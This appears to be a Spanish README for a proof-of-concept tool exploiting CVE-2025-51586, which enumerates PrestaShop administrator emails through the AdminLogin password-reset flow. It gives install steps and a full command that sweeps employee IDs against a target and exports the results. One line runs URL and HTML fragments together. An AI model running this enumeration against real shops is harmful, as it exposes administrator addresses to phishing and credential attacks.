
PoC de enumeración de correo electrónico de AdminLogin de PrestaShop - CVE-2025-51586. Este repositorio proporciona una Prueba de Concepto (PoC) ética para la vulnerabilidad de PrestaShop que permite la enumeración de usuarios a través del mecanismo de restablecimiento de contraseña de AdminLogin. Explica el impacto, la configuración y el uso del script PoC.
Este repositorio contiene una prueba de concepto (PoC) ética para la vulnerabilidad CVE-2025-51586, que afecta a PrestaShop versiones 1.7.x — 8.2.2.
La PoC enumera las direcciones de correo electrónico de los administradores mediante el mecanismo de restablecimiento de contraseña del Back Office (controlador AdminLogin).
https://domain.tld/admin/index.php?controller=AdminLogin&reset=1id_employee válido y un reset_token no válido<input name="reset_email" value="[email protected]">Aviso oficial: Friends of Presta Security
Reportado por Friends of Presta Security Team (aviso publicado el 4 de septiembre de 2025).
Esta PoC es solo para fines educativos y pruebas autorizadas. Úsala únicamente en sistemas que poseas o donde tengas permiso explícito. El autor y los colaboradores no son responsables del mal uso.
Clona el repositorio e instala las dependencias:
git clone https://github.com/7h30th3r0n3/CVE-2025-51586-PrestaShop-PoC.git
cd CVE-2025-51586-PrestaShop-PoC
pip install requests beautifulsoup4 rich
python3 cve_2025_51586_enum.py \
-u "https://target/admin/index.php?controller=AdminLogin&reset=1" \
-s 1 -e 100 -m POST -t invalidtoken123 --delay 0.5 --timeout 10 --export results.csv
PoC desarrollada por 7h30th3r0n3. Vulnerabilidad descubierta por Friends of Presta Security Team.